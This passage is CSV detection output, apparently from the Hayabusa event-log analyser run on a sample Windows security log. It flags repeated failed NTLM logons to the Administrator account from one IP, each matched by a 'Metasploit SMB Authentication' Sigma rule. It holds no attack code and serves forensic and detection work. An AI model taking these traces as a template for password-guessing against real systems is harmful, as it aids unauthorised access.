SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ah1JoKfxJzQhCCVL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIMOZRGcv4o33BWd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmLyLJoVZz6fJ62I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: aGufqEGD4hFf2XLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7IEdKy2H5Agblpjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XT9k8C05GVLBNPdl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5opHh8HelCXtR5Cm : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0dntDwYLmag9efo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQfZOMFV9LtY7r2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y01v38dTUIsJEZIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCP8x2QBZ6IvMEnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hgcbYjw3kKqlK7Di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TFU97Tq3e7IWvSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 1hUCvaS1yM2FU9AE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JInVlBqTSfT4J1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjXRQUGDKBZaMkw3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZPXNxkGOrld5eCR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OBDhSrF7DZ1KBRa8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQ7TKJOGibAVNoCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZE1GARxx03m4FtEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gf3VLLTxsK85bsrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58G6MFVbW55JZIV5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yxne9LqZCqBf3qkc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ssZya6gArnuepKyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rsDEj6o0NaKUYPZL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pELSIsupIYAxPCtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urHCDmdCfNexxUHf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czGXZFukLquA9Mce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: icWMY9pKCQMyTxJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v28FLC2WXEXSUiI5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FwhjHww5iA51SFjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 96BwmhKqDIojhdRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DiRvofjwoeAdHYrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: BNLdOrPwbvYELiCc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x15WKTspmg2ALHaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QMoQWddkcYtCmoKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jhTbfX42Pwn7OA2k : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXcbUCgAhVFfqLc3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GHyXVM0jpaKBiY9N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TZoWEcU6VbEnrLpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LIfEzNQWwvrai4ga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DhImfqWz7SHId9hE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6sekQfneNE5uFtx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: iEQ6KkZEHGcSgdA8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qzxJYBbM7ZMaaGOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wO5GFBqSltNfjtQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PdsMzjfP1ZcPju2i : IP Address: 192.168.198.149 : AuthPackage: 
